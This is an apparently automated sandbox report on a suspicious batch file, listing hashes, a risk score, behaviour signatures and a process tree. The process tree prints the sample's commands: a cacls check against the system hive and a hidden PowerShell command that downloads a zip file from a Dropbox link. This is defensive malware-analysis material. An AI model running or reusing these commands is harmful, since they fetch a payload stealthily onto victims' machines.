Resubmissions

19-11-2024 20:58

241119-zr8a3sxmbp 10

19-11-2024 20:54

241119-zp5r6stalq 8

Analysis

  • max time kernel
    95s
  • max time network
    107s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19-11-2024 20:54

General

  • Target

    slut_keep_admin.bat

  • Size

    1KB

  • MD5

    9152962b6cef0d476f4e89127d8f0255

  • SHA1

    b3b0b2686f0b27eff516ca35443feff8ff5f8026

  • SHA256

    70fbc646366a3184c596ed7cba7055f1405350d164d104fcf4c2eec71c9d6434

  • SHA512

    b609ecc36ea6e417b45099092d1511da78af19855252cbf5050d30abd6d2ee3def57518c5c8676e25e0786cfd22c7bd5dcd98a4da725db2fa102256ad4f3d80e

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\slut_keep_admin.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4580
    • C:\Windows\system32\cacls.exe
      "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
      2⤵
        PID:3152
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -windowstyle hidden -c "Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fo/k55ow4tu1244zp5vbpkdf/AH836nAwzR-bPAcWIy0mnFU?rlkey=6s1decbh5kqtkju1mr1sbjg4s&raw=1' -OutFile 'C:/ProgramData/slut/files.zip'"
        2⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:864
    • C:\Windows\System32\rundll32.exe
      C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
      1⤵
        PID:4200

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_deacqvnp.12r.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • memory/864-0-0x00007FFD82373000-0x00007FFD82375000-memory.dmp

        Filesize

        8KB

      • memory/864-10-0x0000023BD35B0000-0x0000023BD35D2000-memory.dmp

        Filesize

        136KB

      • memory/864-11-0x00007FFD82370000-0x00007FFD82E31000-memory.dmp

        Filesize

        10.8MB

      • memory/864-12-0x00007FFD82370000-0x00007FFD82E31000-memory.dmp

        Filesize

        10.8MB

      • memory/864-13-0x00007FFD82370000-0x00007FFD82E31000-memory.dmp

        Filesize

        10.8MB

      • memory/864-14-0x00007FFD82373000-0x00007FFD82375000-memory.dmp

        Filesize

        8KB

      • memory/864-15-0x0000023BEB980000-0x0000023BEBB9C000-memory.dmp

        Filesize

        2.1MB

      • memory/864-16-0x00007FFD82370000-0x00007FFD82E31000-memory.dmp

        Filesize

        10.8MB